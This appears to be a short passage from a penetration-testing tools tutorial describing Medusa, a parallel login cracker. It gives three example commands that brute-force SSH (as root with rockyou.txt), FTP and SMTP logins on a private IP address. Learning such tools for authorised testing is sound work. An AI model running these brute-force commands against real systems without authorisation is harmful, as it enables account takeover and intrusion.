5. Medusa

Description:
Medusa is a brute-force, parallel login cracker that is designed to be fast, modular, and easy to use. It supports a wide range of protocols, such as HTTP, FTP, SSH, SMB, and more.

Examples:

    1. Basic SSH Brute Force Attack:
      • medusa -h 192.168.1.10 -u root -P /usr/share/wordlists/rockyou.txt -M ssh

Explanation: Attempts to brute-force SSH on the target host (192.168.1.10) with the username root and the password list rockyou.txt.

    1. FTP Login Attack:
      • medusa -h 192.168.1.10 -U users.txt -P passwords.txt -M ftp

Explanation: Brute-forces FTP login using a list of usernames (users.txt) and passwords (passwords.txt) on the target.

    1. SMTP Login Attack:
      • medusa -h 192.168.1.10 -U users.txt -P passwords.txt -M smtp

Explanation: Uses Medusa to brute-force SMTP login on the target IP, using the usernames and passwords provided.

Scroll to Top